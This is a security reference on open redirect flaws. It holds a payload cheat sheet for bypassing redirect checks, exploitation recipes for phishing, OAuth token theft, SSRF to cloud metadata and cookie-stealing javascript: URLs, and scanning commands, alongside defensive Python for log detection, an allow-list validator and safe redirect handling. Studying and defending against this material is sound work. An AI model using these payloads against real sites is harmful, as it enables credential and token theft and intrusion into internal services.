
Overview

The application redirects the user to an attacker-controlled URL taken from an unvalidated parameter. Used for phishing, OAuth token theft, and as a step in SSRF chains.

Common Parameters

?url=
?redirect=
?next=
?return=
?returnUrl=
?rurl=
?dest=
?destination=
?redir=
?redirect_uri=
?redirect_url=
?forward=
?forward_url=
?target=
?to=
?out=
?view=
?login?to=
?image_url=
?go=
?continue=
?checkout_url=

Detection

https://TARGET/login?redirect=https://evil.com
https://TARGET/redirect?url=https://evil.com
https://TARGET/out?to=https://evil.com
Check whether the browser is redirected to evil.com.
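
From the defender's side, detection means watching the access log for these parameter names carrying values that leave the site. The following Python is an added example, not part of the original page: it parses Common Log Format lines (the log format is an assumption of the example), pulls every query parameter whose name appears in the Common Parameters list, and flags values that point off-site once fully percent-decoded. The sample log lines, client addresses and hostnames are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameter names from the Common Parameters list, lower-cased for matching.
REDIRECT_PARAMS = {
    "url", "redirect", "next", "return", "returnurl", "rurl", "dest", "destination",
    "redir", "redirect_uri", "redirect_url", "forward", "forward_url", "target",
    "to", "out", "view", "image_url", "go", "continue", "checkout_url",
}

# Anything that is not a plain relative path: a scheme prefix (https:, javascript:,
# data:) or a protocol-relative start in any slash/backslash spelling.
_OFFSITE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:|[/\\]{2})", re.IGNORECASE)

# Common Log Format request line; the log format is an assumption of this example.
_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

def _decode_fully(value, limit=3):
    """Percent-decode until stable so double-encoded values are judged in final form."""
    for _ in range(limit):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_value(value):
    """True if a redirect parameter value could leave the site after decoding."""
    v = _decode_fully(value)
    return (
        bool(_OFFSITE.match(v))
        or "@" in v                       # userinfo trick: https://TARGET@evil.com
        or "\\" in v                      # backslash confusion: //evil.com\@TARGET
        or not v.isascii()                # lookalike dots such as U+3002
        or any(ord(c) < 0x20 for c in v)  # null bytes, CRLF, tabs
    )

def scan_log(lines):
    """Return (client_ip, request_uri, param, value) for each suspicious redirect parameter."""
    findings = []
    for line in lines:
        m = _LOG.match(line)
        if not m:
            continue
        query = urlsplit(m["uri"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() in REDIRECT_PARAMS and suspicious_value(value):
                findings.append((m["ip"], m["uri"], name, value))
    return findings

# Constructed sample lines (documentation IP ranges, placeholder hostnames).
LOG_SAMPLE = [
    '203.0.113.7 - - [10/Oct/2025:13:55:36 +0000] "GET /login?redirect=/account HTTP/1.1" 302 -',
    '203.0.113.7 - - [10/Oct/2025:13:55:40 +0000] "GET /login?redirect=https://evil.com HTTP/1.1" 302 -',
    '198.51.100.4 - - [10/Oct/2025:13:56:01 +0000] "GET /redirect?url=https%253A%252F%252Fevil.com HTTP/1.1" 302 -',
    '198.51.100.4 - - [10/Oct/2025:13:56:05 +0000] "GET /out?to=//evil.com HTTP/1.1" 302 -',
    '192.0.2.9 - - [10/Oct/2025:13:57:12 +0000] "GET /redirect?url=https://evil%E3%80%82com HTTP/1.1" 302 -',
    '192.0.2.9 - - [10/Oct/2025:13:57:20 +0000] "GET /search?q=redirect HTTP/1.1" 200 -',
]

if __name__ == "__main__":
    for ip, uri, name, value in scan_log(LOG_SAMPLE):
        print(f"{ip} {uri} -> {name}={value!r}")
```

Run it over the access log of the endpoints that accept these parameters. A hit on a 302 response with an off-site value is the signature of the redirect being exercised, whether by a scanner or by a live phishing link, and the client address and timestamp give the pivot for the rest of the investigation.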

Bypass Techniques

Double URL Encoding

https://TARGET/redirect?url=https%3A%2F%2Fevil.com
https://TARGET/redirect?url=https%253A%252F%252Fevil.com

Using @ Symbol

https://TARGET/redirect?url=https://TARGET@evil.com
https://TARGET/redirect?url=https://evil.com#@TARGET
The browser parses this as user@host, so the actual destination is evil.com.

Backslash

https://TARGET/redirect?url=https://evil.com\@TARGET
https://TARGET/redirect?url=//evil.com\@TARGET

Protocol-Relative

https://TARGET/redirect?url=//evil.com
https://TARGET/redirect?url=\/\/evil.com

Subdomain Trick

https://TARGET/redirect?url=https://TARGET.evil.com
https://TARGET/redirect?url=https://evil.com/TARGET

Null Byte / Whitespace

https://TARGET/redirect?url=https://evil.com%00.TARGET
https://TARGET/redirect?url=https://evil.com%0d%0a.TARGET
https://TARGET/redirect?url=https://evil.com%09

CRLF Injection in Redirect

https://TARGET/redirect?url=%0d%0aLocation:%20https://evil.com

JavaScript Protocol

https://TARGET/redirect?url=javascript:alert(document.domain)
https://TARGET/redirect?url=java%0d%0ascript:alert(1)

Data URI

https://TARGET/redirect?url=data:text/html,<script>window.location='https://evil.com'</script>

Dot Bypass

https://TARGET/redirect?url=https://evil。com   # Fullwidth dot
https://TARGET/redirect?url=https://evil%E3%80%82com

Path Traversal

https://TARGET/redirect?url=/\evil.com
https://TARGET/redirect?url=/.evil.com
https://TARGET/redirect?url=/evil.com/..;/
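
The server-side counterpart to the bypass list above is an allow-list validator rather than a block-list of payloads. The following Python is an added example, not code from the original page: it accepts only same-site relative paths and rejects every class shown in this section (absolute URLs, @ userinfo, backslashes, protocol-relative forms, double encoding, null bytes and CRLF, javascript: and data: schemes, the non-ASCII lookalike dot, and ..;/ path tricks) by checking both the raw value and its fully decoded form. SITE_ORIGIN is a placeholder for the application's own origin; redirect_or_default is an assumed helper showing how a login handler would use it.

```python
import re
from urllib.parse import urljoin, urlsplit, unquote

SITE_ORIGIN = "https://TARGET"   # placeholder: the application's own origin

# Allow-list for a redirect parameter: exactly one leading slash, then only
# ASCII path/query characters. The lookahead rejects a second slash or a
# backslash (//evil.com, /\evil.com); the class excludes ':', '@', '\', '#',
# whitespace and every control byte.
_SAFE_PATH = re.compile(r"^/(?![/\\])[A-Za-z0-9\-._~/?=&%]*$")

def _decode_fully(value, limit=3):
    """Percent-decode until stable so https%253A%252F%252F is judged as https://."""
    for _ in range(limit):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def safe_redirect_target(value, origin=SITE_ORIGIN):
    """Return an absolute URL on `origin` for a trusted relative path, else None."""
    if not value:
        return None
    # Both the raw value and its fully decoded form must pass: the raw form is
    # what the browser may receive, the decoded form is what the server or a
    # downstream component may turn it into.
    for candidate in (value, _decode_fully(value)):
        if not candidate.isascii():                 # evil。com and other lookalikes
            return None
        if ".." in candidate or ";" in candidate:   # /evil.com/..;/ style tricks
            return None
        if not _SAFE_PATH.match(candidate):
            return None
    # Belt and braces: resolve against the origin and confirm scheme and host.
    resolved = urljoin(origin + "/", _decode_fully(value))
    want, got = urlsplit(origin), urlsplit(resolved)
    if got.scheme != want.scheme or got.netloc != want.netloc:
        return None
    return resolved

def redirect_or_default(value, default="/"):
    """What a login handler should do: fall back to a fixed path when the value is unsafe."""
    return safe_redirect_target(value) or safe_redirect_target(default)

if __name__ == "__main__":
    for v in ["/account", "https://evil.com", "//evil.com", "https%253A%252F%252Fevil.com",
              "/%2F%2Fevil.com", "javascript:alert(1)", "https://evil\u3002com", "/evil.com/..;/"]:
        print(f"{v!r:45} -> {redirect_or_default(v)}")
```

The allow-list is deliberately narrow: relative paths only, no absolute same-site URLs, no encoded spaces. Widen the character class only for paths the application actually emits, and keep the decoded-form check, because the value ends up in a Location header after whatever decoding the framework performs on the way there.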

Exploitation

Phishing

https://legit-site.com/login?redirect=https://evil-site.com/fake-login
Victim sees legitimate domain in link → enters credentials on fake page.

OAuth Token Theft

https://auth.TARGET/authorize?client_id=APP&redirect_uri=https://TARGET/callback?next=https://evil.com
The authorization server returns the token to the registered redirect_uri on TARGET, whose own open redirect (next=) then forwards it to the attacker.

SSRF Chain

If the server-side fetcher follows redirects:
https://TARGET/fetch?url=https://TARGET/redirect?url=http://169.254.169.254/latest/meta-data/
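
The fetcher-side mitigation for this chain is to follow redirects manually and re-apply the destination policy on every hop, so the open redirect cannot steer a server-side fetch to link-local or private addresses. The Python below is an added example, not code from the original page: fetch and resolve are injected callables with an assumed interface (fetch must not follow redirects itself), resolve_dns shows the production resolver, and the demo table of hostnames to addresses and the fake fetch are constructed so the block runs without a network.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

REDIRECT_STATUSES = {301, 302, 303, 307, 308}

def hop_allowed(url, resolve):
    """Destination policy applied to the first URL and to every redirect hop.

    `resolve(host)` returns the IP address strings the host maps to. It is injected
    so the check runs offline in tests and so the caller can connect to exactly the
    addresses that were checked (closing the DNS-rebinding window).
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False                         # javascript:, data:, file:, gopher: ...
    if not parts.hostname or parts.username is not None or parts.password is not None:
        return False                         # refuse userinfo forms like https://TARGET@evil.com
    try:
        addrs = [ipaddress.ip_address(a) for a in resolve(parts.hostname)]
    except ValueError:
        return False
    if not addrs:
        return False
    # is_global is False for 169.254.169.254, 10/8, 127/8, 172.16/12, 192.168/16, ::1 ...
    return all(addr.is_global for addr in addrs)

def fetch_with_safe_redirects(url, fetch, resolve, max_hops=5):
    """Follow redirects by hand and re-check the policy on each hop.

    `fetch(url)` returns (status, headers, body) and must NOT follow redirects on
    its own; otherwise the open redirect on TARGET is followed before any check runs.
    """
    for _ in range(max_hops + 1):
        if not hop_allowed(url, resolve):
            raise ValueError(f"blocked by policy: {url}")
        status, headers, body = fetch(url)
        location = headers.get("Location")
        if status in REDIRECT_STATUSES and location:
            url = urljoin(url, location)     # relative Location headers are legal
            continue
        return url, status, body
    raise ValueError("too many redirects")

def resolve_dns(host):
    """Production resolver: every address the name maps to, A and AAAA."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

# --- constructed demo, no network ------------------------------------------
_DEMO_ADDRS = {                   # hostname -> addresses, invented for the example
    "target": ["93.184.216.34"],  # a publicly routable address standing in for the site
    "169.254.169.254": ["169.254.169.254"],
}

def _demo_resolve(host):
    return _DEMO_ADDRS.get(host.lower(), [])

def _demo_fetch(url):
    # TARGET's open redirect answers with the attacker-supplied Location.
    if url.startswith("https://TARGET/redirect?url="):
        return 302, {"Location": url.split("url=", 1)[1]}, b""
    return 200, {}, b"ok"

def demo():
    """Outcome of the chain shown in the text versus a plain same-site fetch."""
    out = {}
    chained = "https://TARGET/redirect?url=http://169.254.169.254/latest/meta-data/"
    try:
        fetch_with_safe_redirects(chained, _demo_fetch, _demo_resolve)
        out["chain"] = "fetched"
    except ValueError as e:
        out["chain"] = str(e)
    final_url, status, _ = fetch_with_safe_redirects("https://TARGET/home", _demo_fetch, _demo_resolve)
    out["plain"] = (final_url, status)
    return out

if __name__ == "__main__":
    print(demo())
```

The first hop to TARGET passes, the 302 to the metadata address is rejected before any connection is made. Connect to the addresses resolve returned rather than letting the HTTP client resolve the name again; otherwise a name can answer differently at check time and at connect time.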

XSS via javascript: Protocol

https://TARGET/redirect?url=javascript:alert(document.cookie)

Automation

Fuzzing Parameters

# Find redirect parameters
cat urls.txt | grep -iE "redirect|url|next|return|dest|forward|to|go|continue" | sort -u

With gf Patterns

cat urls.txt | gf redirect

Nuclei

nuclei -t http/vulnerabilities/open-redirect/ -l urls.txt

Quick Reference

Bypass              Payload
Basic               ?url=https://evil.com
@ trick             ?url=https://TARGET@evil.com
Protocol-relative   ?url=//evil.com
Subdomain           ?url=https://TARGET.evil.com
Backslash           ?url=//evil.com\@TARGET
Double encode       ?url=https%253A%252F%252Fevil.com
javascript:         ?url=javascript:alert(1)
